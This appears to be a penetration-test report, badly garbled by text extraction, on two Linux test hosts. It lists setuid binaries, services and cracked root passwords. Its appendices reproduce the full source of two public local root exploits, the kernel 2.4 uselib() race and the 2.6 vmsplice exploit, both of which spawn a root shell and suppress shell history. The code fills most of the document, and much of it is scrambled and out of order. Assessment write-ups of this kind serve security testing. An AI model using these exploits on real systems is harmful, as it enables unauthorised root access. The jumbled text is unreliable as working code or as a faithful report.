/bin/ping6. distcache. the root passwords were cracked. nobody. dbus.nfs4. games. the www. the milw0rm. Passwords for root accounts on cptvm1 and cptvm2 The password for root@cptvm1 is cavalry The password for root@cptvm2 is admin M. the “cptvm1” and “cptvm2” user accounts were brute force password attacked.104) Operating system: Linux Kernel version: Linux 2. rpm. /sbin/mount. /usr/bin/gpasswd. Next.nfs4. This provided basic access to the cptvm2 hosts.nfs. /usr/kerberos/bin/ksu. a site like secwatch. 939 TCP services: 22/tcp ssh OpenSSH 4. /usr/bin/chage.com site has more extensive information about an exploit but may only list “Exploit code has been published” instead of actual exploit code. /bin/mount. xfs Files that execute as root: /usr/bin/sudo. /usr/bin/chfn. cptvm2. named. pcap. the cptvm2 host was compromised via a vmsplice exploit. rpc.1. nscd.hal-mtablock. ii.txt * * I modified the Paul Starzetz's exploit. This would have save quite a bit of time compiling.4 VMA exploit /* * Linux kernel 2.h> <sys/time.4 SMP. With this in mind. The exploit still works only on 2.h> <limits.The use of a single site to complete exploit research isn't going to be a successful approach at this time.pl/vulnerabilities/isec-0021-uselib. * * thx newbug.4 uselib() privilege elevation exploit.h> <unistd.h> <sys/mman. Full research into the vulnerabilities of a target prior to attempting to execute any exploits is key.h> . This proved to be the exactly opposite approach that was required for this examination.h> <syscall. If this approach had been adhered to more. made it more possible * to race successfully. Source code for the Kernel 2. * It should be also works on 2.h> <sys/wait. 5.h> <sys/types.h> <sys/sysinfo.4 series.h> <sched. but not easy.org> Jan 2005. * * Tim Hsu <timhsu at chroot. I focused my search on items surrounding the kernel but waited to research the kernel exploits until the end.h> <stdlib.h> <fcntl. * * original exploit source from http://isec.h> <errno.h> <string. * */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include <stdio.pl * reference: http://isec. debugging and testing unsuccessful exploits. a full review of all of the vulnerabilities would have yielded the kernel exploits as the top contenders. Appendix A. Attack vectors All of the articles that I have read and the individuals that I have spoken with lateley state that the majority of the future exploits will be found outside of the operating system. h> #include <asm/page.h> #include <linux/linkage. change this #define MAGIC 0xdeadbabe // do not touch #define SLAB_THRSH 128 #define SLAB_PER_CHLD(INT_MAX .1) #define LIB_SIZE ( PAGE_SIZE * 4 ) #define STACK_SIZE ( PAGE_SIZE * 4 ) #define LDT_PAGES ( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE ) #define ENTRY_GATE ( LDT_ENTRIES-1 ) #define SEL_GATE ( (ENTRY_GATE<<3)|0x07 ) #define ENTRY_LCS #define SEL_LCS #define ENTRY_LDS #define SEL_LDS #define kB #define MB #define GB #define TMPLEN #define PGD_SIZE ( ENTRY_GATE-2 ) ( (ENTRY_LCS<<3)|0x04 ) ( ENTRY_GATE-1 ) ( (ENTRY_LDS<<3)|0x04 ) * 1024 * 1024 kB * 1024 MB 256 ( PAGE_SIZE*1024 ) extern char **environ. static pid_t consume_pid. go = 0. static char name[TMPLEN]. static volatile int val = 0. static char line[TMPLEN].h> #include <asm/ldt.#include <linux/elf. scnt = 0.h> #define str(s) #s #define xstr(s) str(s) #define MREMAP_MAYMOVE 1 // temp lib location #define LIBNAME "/tmp/_elf_lib" // shell name #define SHELL "/bin/bash" // time delta to detect race #define RACEDELTA 5000 // if you have more deadbabes in memory. static char cstack[STACK_SIZE]. finish = 0. ccnt=0. .h> #include <asm/segment. int. inline _syscall2(int. int. void*. b. int. func. int. int. static char *myenv[] = {"TERM=vt100". old_esp. static int fstop=0. NULL}. vma_end. silent=0. static char hellc0de[] = "\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70" "\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75 \x65\x52\x00". map_addr. int. inline _syscall3(int. b. sys_munmap. c. b). addr_max. int. smp. "HISTFILE=/dev/null". int. smp_max=0. pidx. a. int. d. sys_mmap2. int. int. map_flags = PROT_WRITE|PROT_READ. a. void*. a. #define #define #define #define #define #define #define #define __NR_sys_gettimeofday __NR_gettimeofday __NR_sys_sched_yield __NR_sched_yield __NR_sys_madvise __NR_madvise __NR_sys_uselib __NR_uselib __NR_sys_mmap2 __NR_mmap2 __NR_sys_munmap __NR_munmap __NR_sys_mprotect __NR_mprotect __NR_sys_mremap __NR_mremap inline _syscall6(int. int. sys_gettimeofday. void*. f). int. e. int. b. int. task_size. inline _syscall3(int. int. int. cpid. wtime=2. int. inline _syscall5(int. max_page. c. sys_mremap. addr_min. map_base=0. static struct timeval tm1. inline _syscall2(int. b. ptr. b). lib_addr. *libname=LIBNAME. int. int. a. map_count=0. void *. c). sys_mprotect. delta_max = RACEDELTA. tm2. bytecount ). d.delta = 0. static char *pagemap. a. pnum=0. uid. . a. c). vma_start. inline _syscall3( int. sys_madvise. *shellname=SHELL. e). modify_ldt. int critical) { int sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL). . l). if (vmem == NULL) { perror("malloc"). } // try to race do_brk sleeping on kmalloc. return -1.. vmem = malloc(info. sys_uselib. inline _syscall0(void. unlink(libname). char*. sig). for(.inline _syscall1(int.freeram).) kill(0. } void fatal(const char *message. SIGKILL). entering endless loop"). return r. "\n[-] FAILED: %s (%s) ". message. message). r=t2->tv_sec . r+=t2->tv_usec . 0x90. kill(cpid. struct timeval *t2) { int r. may need modification for SMP int raceme(void* v) { finish=1.) { errno = 0.freeram). sysinfo(&info). printf("\n"). for(. fflush(stdout). (char*) (strerror(errno)) ). } inline int tmdiff(struct timeval *t1. info. if(!errno) { fprintf(stdout. r*=1000000.t1->tv_sec. char *vmem.. } else { fprintf(stdout. int consume_memory() { struct sysinfo info. "\n[-] FAILED: %s ". } memset(vmem. } if(critical) printf("\nCRITICAL.t1->tv_usec. sys_sched_yield). // check if raced: recheck: if(!go) sys_sched_yield(). sys_gettimeofday(&tm2, NULL); delta = tmdiff(&tm1, &tm2); if(!smp_max && delta < (unsigned)delta_max) goto recheck; smp = smp_max; // check if lib VMAs exist as expected under race condition recheck2: val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL); if(val) continue; errno = 0; val = sys_madvise((void*) (lib_addr+PAGE_SIZE), LIB_SIZE-PAGE_SIZE, MADV_NORMAL); if( !val || (val<0 && errno!=ENOMEM) ) continue; // SMP? smp--; if(smp>=0) goto recheck2; // recheck race if(!go) continue; finish++; we need to free one vm_area_struct for mmap to work val = sys_mprotect(map_addr, PAGE_SIZE, map_flags); if(val) fatal("mprotect", 0); val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(-1==val) fatal("mmap2 race", 0); printf("\n[+] race won maps=%d", map_count); fflush(stdout); kill(consume_pid, SIGKILL); _exit(0); } // return 0; } int callme_1() { return val++; } inline int valid_ptr(unsigned ptr) { return ptr>=task_size && ptr<addr_min-16; } inline int validate_vma(unsigned *p, unsigned s, unsigned e) { unsigned *t; if(valid_ptr(p[0]) && valid_ptr(p[3]) && p[1]==s && p[2]==e) { t=(unsigned*)p[3]; if( t[0]==p[0] && t[1]<=task_size && t[2]<=task_size ) return 1; } return 0; } asmlinkage void kernel_code(unsigned *task) { unsigned *addr = task; // find & reset uids while(addr[0] != uid || addr[1] != uid || addr[2] != uid || addr[3] != uid) addr++; addr[0] = addr[1] = addr[2] = addr[3] = 0; addr[4] = addr[5] = addr[6] = addr[7] = 0; // find & correct VMA for(addr=(unsigned *)task_size; (unsigned)addr<addr_min-16; addr++) { if( validate_vma(addr, vma_start, vma_end) ) { addr[1] = task_size - PAGE_SIZE; addr[2] = task_size; break; } } } void kcode(void); // CPL0 code mostly stolen from cliph void __kcode(void) { asm( "kcode: " pusha \n" " pushl %es \n" " pushl %ds \n" " movl $(" xstr(SEL_LDS) ") ,%edx \n" " movl %edx,%es \n" " movl %edx,%ds \n" " movl $0xffffe000,%eax \n" " andl %esp,%eax \n" " pushl %eax \n" " call kernel_code \n" " addl $4, %esp \n" " popl %ds \n" " popl %es \n" " popa \n" " lret \n" ); } int callme_2() { return val + task_size + addr_min; } void sigfailed(int v) { ccnt++; fatal("lcall", 1); } // modify LDT & exec void try_to_exploit(unsigned addr) { volatile int r, *v; printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout); \n" unlink(libname); r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags); if(r) fatal("mprotect 1", 1); // check if really LDT v = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) ); signal(SIGSEGV, sigfailed); r = *v; if(r != MAGIC) { printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout); fatal("find LDT", 1); } // yeah, setup CPL0 gate v[0] = ((unsigned)(SEL_LCS)<<16) | ((unsigned)kcode & 0xffffU); v[1] = ((unsigned)kcode & ~0xffffU) | 0xec00U; printf("\n[+] gate modified ( 0x%.8x 0x%.8x )", v[0], v[1]); fflush(stdout); // setup CPL0 segment descriptors (we need the 'accessed' versions ;-) v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) ); v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */ v[1] = 0x00cf9b00; v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) ); v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */ v[1] = 0x00cf9300; // reprotect to get only one big VMA r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|map_flags); if(r) fatal("mprotect 2", 1); CPL0 transition sys_sched_yield(); val = callme_1() + callme_2(); asm("lcall $" xstr(SEL_GATE) ",$0x0"); //if( getuid()==0 || (val==31337 && strlen(hellc0de)==31337) ) { if (getuid()==0) { printf("\n[+] exploited, uid=0\n\n" ); fflush(stdout); } else { printf("\n[-] uid change failed" ); fflush(stdout); sigfailed(0); } signal(SIGTERM, SIG_IGN); kill(0, SIGTERM); setresuid(0, 0, 0); execl(shellname, "sh", NULL); fatal("execl", 0); // } void scan_mm_finish(); void scan_mm_start(); // kernel page table scan code void scan_mm() { map_addr -= PAGE_SIZE; if(map_addr <= (unsigned)addr_min) scan_mm_start(); scnt=0; val = *(int*)map_addr; seg_32bit = 1. } void scan_mm_finish() { retry: __asm__("movl%0. l. } else { sys_madvise((void*)map_addr. } else if(npg == LDT_PAGES) { npg=0. sizeof(l)). sizeof(l)) != 0 ) fatal("modify_ldt". l. static struct modify_ldt_ldt_s l. } // make kernel page maps before and after allocating LDT void scan_mm_start() { static int npg=0. %%esp" : :"m"(old_esp) ). pidx++) { if(pagemap[pidx]) { npg++. goto retry.scan_mm_finish(). 0. pidx = max_page-1. pidx<=max_page-1. if( modify_ldt(1. } // save context & scan page table __asm__("movl%%esp. } else { npg=0. scan_mm(). //static struct user_desc l. } . PAGE_SIZE. %0" : :"m"(old_esp) ).limit = MAGIC & 0xffff. l. } } fatal("find LDT". if(pnum==1) { pidx = max_page-1. try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE).base_addr = MAGIC >> 16. scan_mm(). } else if(pnum==2) { memset(&l. if(scnt) { pagemap[pidx] ^= 1. map_addr = addr_max. } pidx--. l. pnum++.entry_number = LDT_ENTRIES-1. } else if(pnum==3) { npg=0.limit_in_pages = 1. 1). 1). l. MADV_DONTNEED). for(pidx=0. &l. } memmaped_size += PAGE_SIZE. d. "r"). do { c = u = a = -1. WNOHANG|WUNTRACED). if(MAP_FAILED == r) { printf("--> prepare_slab(). sizeof(line) . map_flags. &d). . } // child reap void reaper(int v) { ccnt++. &d. *r = map_addr. &d. 0). // leave one object in the SLAB inline void prepare_slab() { int *r. } while (strcmp(name. close(fileno(fp)).1. 0).1. PAGE_SIZE. name. return c == 7 ? a . fp = fopen("/proc/slabinfo". map_count++. map_addr -= PAGE_SIZE. // so just use anyone of the two but take care about the flags void check_vma_flags(). &v. u = 0. r = (void*)sys_mmap2((unsigned)map_addr. sizeof(name) . } // sig handlers void segvcnt(int v) { scnt++. &u. fclose(fp)... fp)) break. map_flags ^= PROT_READ. sn)). FILE *fp=NULL. memmaped_size/1024/1024). if(!fp) fatal("get_slab_objs: fopen". fp). 0). c = sscanf(line. } long memmaped_size = 0. MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED. "%s %u %u %u %u %u %u".u : -1. %dMb\n". if (!fgets(line. char x1[20]. scan_mm_finish(). a = 0. waitpid(0. &a. fatal("try again". fgets(name. } // sometimes I get the VMAs in reversed order.// return number of available SLAB objects in cache int get_slab_objs(const char *sn) { static int c. &d. 0. } signal(SIGSEGV..) { r = get_slab_objs("vm_area_struct"). if(finish) break. 0). ccnt=0. r=sys_uselib(libname).r). r--. cpid = clone(&raceme. } void check_vma_flags() { if(map_flags) { __asm__("movl%%esp. fflush(stdout). //printf("\nfree slab = %d\n". // wipe lib VMAs and try again r = sys_munmap(lib_addr. NULL). synchronize threads while(!finish) sys_sched_yield(). } else { __asm__("movl%0. sz. check_vma_flags(). 0). pcnt=0. goto out. %0" : :"m"(old_esp) ). if(ccnt) goto failed. fflush(stdout). } try to hit the kmalloc race for(. (void*) &cstack[sz-16]. static char smiley[]="-\\|/-\\|/". val = * (unsigned*)(lib_addr + PAGE_SIZE). %%esp" : :"m"(old_esp) ). while(r != 1 && r > 0) { prepare_slab(). LIB_SIZE). if(r) fatal("munmap lib". vreversed). getpid() ). sz = sizeof(cstack) / sizeof(cstack[0]).void vreversed(int v) { map_flags = 0. CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD. if(!silent) { printf("\n"). out: } // use elf library and try to sleep on kmalloc void exploitme() { int r. } sys_gettimeofday(&tm1. go = 0. NULL ). go = 1. 0). helper clone finish=0. // // . // // printf("\n cat /proc/%d/maps". finish=0. if(r) fatal("uselib". if(-1==cpid) fatal("clone". if(-1==r) { fatal("mprotect brk".. &tm2). if( wtime*1000000U <= (unsigned)delta ) break. MADV_NORMAL). } } vma_start = lib_addr + PAGE_SIZE. printf("\n expanded VMA (0x%. 0). 0). if(r) fatal("munmap 2". for(. . segvcnt). 0). if(r) fatal("madvise". } we need to check the PROT_EXEC flag map_flags = PROT_EXEC.8x)". NULL). segvcnt). map_base-map_addr + PAGE_SIZE). delta = tmdiff(&tm1.PAGE_SIZE. if(!map_flags) { printf("\n VMAs reversed"). LIB_SIZE-PAGE_SIZE.. sz = (0-lib_addr) . 0). r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE. } // seems we raced.LIB_SIZE . free mem r = sys_munmap(map_addr. failed: printf("failed:\n"). } write protect brk's VMA to fool vm_enough_memory() r = sys_mprotect((lib_addr + PAGE_SIZE). vma_start. signal(SIGSEGV. PROT_READ|map_flags). vma_end = vma_start + sz + 2*PAGE_SIZE. fflush(stdout).8x-0x%. } // // // // this will finally make the big VMA. expand: r = sys_madvise((void*)(lib_addr + PAGE_SIZE). vma_end). } else { sz -= PAGE_SIZE. if(-1==r) { if(0==sz) { fatal("mremap: expand VMA". PAGE_SIZE.. fflush(stdout). NULL). reaper). fatal("try again". fflush(stdout). MREMAP_MAYMOVE. %c". PAGE_SIZE). if(r) fatal("munmap 1". // try to figure kernel layout signal(SIGCHLD. r = sys_munmap(lib_addr. } pcnt++. goto expand.if( !silent && !(pcnt%64) ) { printf("\r Wait.. sys_gettimeofday(&tm2. LIB_SIZE-PAGE_SIZE. 0). check_vma_flags().) { sys_sched_yield(). signal(SIGBUS. scan_mm_start(). 0). 0). sz.. relax kswapd sys_gettimeofday(&tm1. smiley[ (pcnt/64)%8 ]). write(fd. &eh. // // // } // move stack down #2 void prepare_finish() { int r. write(fd. eh. eh. 0). if(fd<0) fatal("open lib ("LIBNAME" not writable?)". 0755). eh. eh. &tmpbuf. 0).p_flags = PF_W|PF_R|PF_X. task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB.p_memsz = LIB_SIZE. eph. 0.e_phentsize = sizeof(struct elf_phdr). task_size-old_esp). eph.} // make fake ELF library void make_lib() { struct elfhdr eh. lib_addr = task_size . sizeof(eph) ). eh. memset(tmpbuf. &eph. write(fd. 4096. printf("\n[+] moved stack %x.PGD_SIZE) & ~(PGD_SIZE-1). sizeof(eh) ). sizeof(eh) ). r = sys_munmap(old_esp. static char tmpbuf[PAGE_SIZE]. old_esp &= ~(PAGE_SIZE-1). elf exec header memcpy(eh. eph. memset(&eh. // make our elf library umask(022).p_vaddr = lib_addr. eph.e_ident. 0x90. sizeof(eph) ). ELFMAG. old_esp -= PAGE_SIZE. .p_offset = 4096. int fd. struct elf_phdr eph.p_type = PT_LOAD. // setup rt env uid = getuid(). if(r) fatal("unmap stack".e_type = ET_EXEC.PAGE_SIZE.e_phnum = 1. eph. SELFMAG).e_machine = EM_386. map_base=0x%.8x". sizeof(tmpbuf) ). static struct sysinfo si. sizeof(tmpbuf) ). O_RDWR|O_CREAT|O_TRUNC.p_filesz = 4096. fd=open(libname. else map_base = map_addr = (lib_addr . unlink(libname). SEEK_SET). 0. eph.LIB_SIZE . section header: memset(&eph.8x. task_size=0x%. execable code lseek(fd. close(fd).e_phoff = sizeof(eh). if(map_base) map_addr = map_base. 0.totalram. if((unsigned)addr_max >= 0xffffe000 || (unsigned)addr_max < (unsigned)addr_min) addr_max = 0xffffd000. map_base). 0 ). __asm__("movl%%esp. addr_min = (addr_min + PGD_SIZE . max_page + 32). pagemap = malloc( max_page + 32 ). addr_max). for(. // } // move stack down #1 void prepare() { unsigned p=0. old_esp = map_base? map_base : old_esp. addr_max = addr_min + si. MAP_PRIVATE|MAP_ANONYMOUS.) { if(left<=0) left = get_slab_objs("vm_area_struct"). prepare_finish(). addr_min. // check physical mem & prepare sysinfo(&si).addr_min) / PAGE_SIZE. } void chldcnt(int v) { ccnt++. left=0.. %0" : : "m"(old_esp) ). if(!pagemap) fatal("malloc pagemap".0x%. %%esp \n" : : "m"(old_esp). old_esp = (old_esp . fflush(stdout). 1).totalram.. if(left <= SLAB_THRSH) break. memset(pagemap. if(-1==p) fatal("mmap2 stack". c=0.64. printf("\n[+] vmalloc area 0x%. "m"(p) ). environ = myenv. addr_min = task_size + si. STACK_SIZE. 0). PROT_READ|PROT_WRITE.old_esp. %0 \n" "movl %1. } // alloc slab objects. max_page = (addr_max .8x".. go go make_lib().8x . p = sys_mmap2( 0. inline void do_wipe() { int *r. exploitme().PGD_SIZE+1) & ~(PGD_SIZE-1).1) & ~(PGD_SIZE-1). . __asm__("movl%%esp. p += STACK_SIZE . task_size. 0. SIG_DFL). for(. val++. -b to clean SLAB int main(int ac. if( get_slab_objs("vm_area_struct") <= SLAB_THRSH ) break. _exit(1). for(. } c++. fflush(stdout). if(MAP_FAILED == r) break. printf("\t\t-c command to run\n"). 0. SIGUSR1). fflush(stdout).) pause(). chldcnt). printf("\t\t-d race delta us\n"). map_flags. printf("\n"). PAGE_SIZE.left--.) { ccnt=0. if(c>SLAB_PER_CHLD) break. cpid = fork(). val. while(!ccnt) sys_sched_yield(). fflush(stdout). kill(getppid(). MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED. if(!cpid) do_wipe(). } printf("\r child %d VMAs %d". printf("\t\t-a alternate addr hex\n"). printf("\t\t-n SMP iterations\n"). n). c). old_esp -= PAGE_SIZE. } // empty SLAB caches void wipe_slab() { signal(SIGUSR1. 0 ). r = (void*)sys_mmap2(old_esp. printf("\t\t-w wait time seconds\n"). c). val. map_flags ^= PROT_READ.. char **av) { int r. } signal(SIGUSR1. printf("\t\t-l alternate lib name\n"). } void usage(char *n) { printf("\nUsage: %s\t-f forced stop\n". printf("\n[+] SLAB cleanup"). if( (c%1024)==0 ) { if(!c) printf("\n"). printf("\r child %d VMAs %d". } // give -s for forced stop.. printf("\t\t-s silent mode\n"). . case 'w' : wtime = atoi(optarg). case 'l' : libname = strdup(optarg). "%u". break. break. } } consume_pid = fork(). &delta_max) || delta_max > 100000u ) fatal("bad delta value". setpgrp(). break. if(wtime<0) fatal("bad wait value". break. 0). wipe_slab(). prepare(). av. } basic setup uid = getuid(). 0). case 's' : silent = 1. break. pause(). break. if (consume_pid == 0) { consume_memory().while(ac) { r = getopt(ac. &map_base)) fatal("bad addr value". case 'a' : if(1!=sscanf(optarg. // return 0. case 'c' : shellname = strdup(optarg). return 0. case 'n' : smp_max = atoi(optarg). 0). case 'd': if(1!=sscanf(optarg. break. "%x". if(r<0) break. "n:l:a:w:c:d:fsh"). break. case 'h' : default: usage(av[0]). break. map_base &= ~(PGD_SIZE-1). switch(r) { case 'f' : fstop = 1. } . 24. } .6.h> #include <errno.17 . * It should work well. int mapcount.6.c * * Dovalim z knajpy a cumim ze Wojta zas nema co robit.h> #include <asm/page. tutaj mate cosyk na hrani.h> #include <malloc. void char void { exit_code().h> #include <signal. int err) printf(err ? "[-] %s: %s\n" : "[-] %s\n". Source code for the Kernel 2.1 * * This is quite old code and I had to rewrite it to even compile. * Stejnak je to stare jak cyp a aj jakesyk rozbite. fflush(stdout).h> #include <stdlib. }.com [2005-01-27] B. exit(1). die(char *msg. int count. struct { long next. kura. so I'm not 100% sure about it. You've been warned .2. * Gizdi. kym aj totok vykeca. msg.6 vmsplice exploit /* * jessica_biel_naked_in_my_bed.h> #include <unistd.h> #define #define #define #define #define PIPE_BUFFERS 16 PG_compound14 uint unsigned int static_inline static inline __attribute__((always_inline)) STACK(x) (x + sizeof(x) . unsigned long index. * * Linux vmsplice Local Root Exploit * By qaaz * * Linux 2. void *mapping.h> #include <string. but I don't remeber original intent of all * the code. unsigned long private. strerror(err)).// milw0rm. } lru.h> #include <sys/mman.h> #include <sys/uio. prev.h> #include <limits.40) struct page { unsigned long flags. exit_stack[1024 * 1024]. fflush(stderr).h> #define __KERNEL__ #include <asm/unistd.) * * -static -Wno-format */ #define _GNU_SOURCE #include <stdio. #if defined (__i386__) #ifndef __NR_vmsplice #define __NR_vmsplice #endif #define USER_CS #define USER_SS #define USER_FL 316 0x73 0x7b 0x246 static_inline void exit_kernel() { __asm__ __volatile__ ( "movl %0. } . "i" (USER_FL)." "movq %1. "r" (exit_code) ). 0x08(%%rsp) . } static_inline void *get_current() { unsigned long curr." "movq %3. 0x10(%%rsp) . __asm__ __volatile__ ( "movl %%esp. "r" (STACK(exit_stack)). 0x00(%%rsp) . %0" : "=r" (curr) : "i" (~8191) ). "r" (exit_code) ). %%eax . 0x18(%%rsp) . "i" (USER_CS). "i" (USER_FL). "r" (STACK(exit_stack))." "movl %3." "movq %2." "andl %1. 0x04(%%esp) ." "movl (%%eax)." "iretq" : : "i" (USER_SS)." "movl %4. 0x0c(%%esp) ." "iret" : : "i" (USER_SS)." "movl %1. 0x08(%%esp) . 0x20(%%rsp) . 0x00(%%esp) . } #elif defined (__x86_64__) #ifndef __NR_vmsplice #define __NR_vmsplice #endif #define USER_CS #define USER_SS #define USER_FL 278 0x23 0x2b 0x246 static_inline void exit_kernel() { __asm__ __volatile__ ( "swapgs . 0x10(%%esp) . return (void *) curr." "movl %2." "movq %4." "movq %0. "i" (USER_CS). %%eax . putenv("HISTFILE=/dev/null"). (fd). (io). } void { exit_code() if (getuid() != 0) die("wtf". } exit_kernel(). struct iovec *. __asm__ __volatile__ ( "movq %%gs:(0). NULL). nr_segs. i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0.nr. syscall(__NR_vmsplice. i < 1024-13. gid. } #else #error "unsupported arch" #endif #if defined (_syscall4) #define __NR__vmsplice __NR_vmsplice _syscall4( long.fl) #endif static uint uid. p = (uint *) ((char *)(p + 8) + sizeof(void *)). *p = get_current(). "bash". unsigned long. %0" : "=r" (curr) ). fd. int. } int main(int argc. unsigned int. "-i". void { kernel_code() int uint i. break.io. errno). flags) #else #define _vmsplice(fd. iov. 0). char *argv[]) . printf("[+] root\n").static_inline void *get_current() { unsigned long curr. _vmsplice. return (void *) curr. (fl)) for (i = 0. p[0] = p[1] = p[2] = ~0. (nr). die("/bin/bash". } p++. p[4] = p[5] = p[6] = p[7] = 0. execl("/bin/bash". pages[0]). (long) kernel_code. 0). /*****/ pages[0] = *(void **) &(int[2]){0. /*****/ pages[2] = *(void **) pages[0]. -1. struct page *pages[5]. map_size..0}. printf("[+] mmap: 0x%lx .next = = = = 1 << PG_compound. errno). /*****/ pages[4] = *(void **) &(int[2]){PAGE_SIZE. PROT_READ | PROT_WRITE. errno). pages[2]). size_t map_size. map_addr = mmap(pages[0]. pages[3] = pages[2] + 1. printf("[+] page: 0x%lx\n". char * map_addr. 0).next = = = = 1 << PG_compound. PROT_READ | PROT_WRITE. map_addr + map_size). (long) kernel_code. (unsigned long) pages[0]. printf("[+] page: 0x%lx\n". printf("-----------------------------------\n"). map_size = PAGE_SIZE. pages[0]->flags pages[0]->private pages[0]->count pages[1]->lru. uid = getuid().. pages[1]). 0x%lx\n". memset(map_addr. map_addr = mmap(pages[2]. printf("[+] page: 0x%lx\n". memset(map_addr. if (map_addr == MAP_FAILED) die("mmap". gid). setresuid(uid. uid). gid = getgid(). 0). map_addr + map_size). map_size = PAGE_SIZE. if (!uid || !gid) die("!@#$". 0. map_size = PAGE_SIZE. map_size. map_size). pages[2]->flags pages[2]->private pages[2]->count pages[3]->lru. printf("[+] page: 0x%lx\n". PROT_READ | PROT_WRITE. printf("[+] mmap: 0x%lx .PAGE_SIZE}. 0). printf("-----------------------------------\n"). pages[3]). 0. map_addr. 1. gid. map_addr = mmap(pages[4]. 0x%lx\n". map_addr. printf(" Linux vmsplice Local Root Exploit\n"). MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS. 1. pages[1] = pages[0] + 1.{ int pi[2]. struct iovec iov. . map_size. setresgid(gid. -1. MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS. -1. (unsigned long) pages[2]. printf(" By qaaz\n"). uid. map_size). MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS. if (map_addr == MAP_FAILED) die("mmap". printf("[+] mmap: 0x%lx . if (map_addr == MAP_FAILED) die("mmap". map_size.if (map_addr == MAP_FAILED) die("mmap". &iov. map_addr. errno). memset(map_addr. map_size). PAGE_SIZE) < 0) die("munmap". 1. pages[4]). map_size). printf("[+] mmap: 0x%lx . /*****/ map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE. printf("[+] page: 0x%lx\n". errno). errno). iov.. iov. map_addr. signal(SIGPIPE.iov_len = ULONG_MAX. if (munmap(map_addr + map_size. map_addr = mmap(NULL.. 0). 0). errno). -1.com [2008-02-09] . close(pi[0]). die("vmsplice". /*****/ if (pipe(pi) < 0) die("pipe". errno). memset(map_addr. return 0. PROT_READ | PROT_WRITE.iov_base = map_addr. 0x%lx\n". 0. 0x%lx\n". } // milw0rm. map_addr + map_size). /*****/ map_size -= 2 * PAGE_SIZE. 0. MAP_PRIVATE | MAP_ANONYMOUS. map_addr + map_size). exit_code). _vmsplice(pi[1].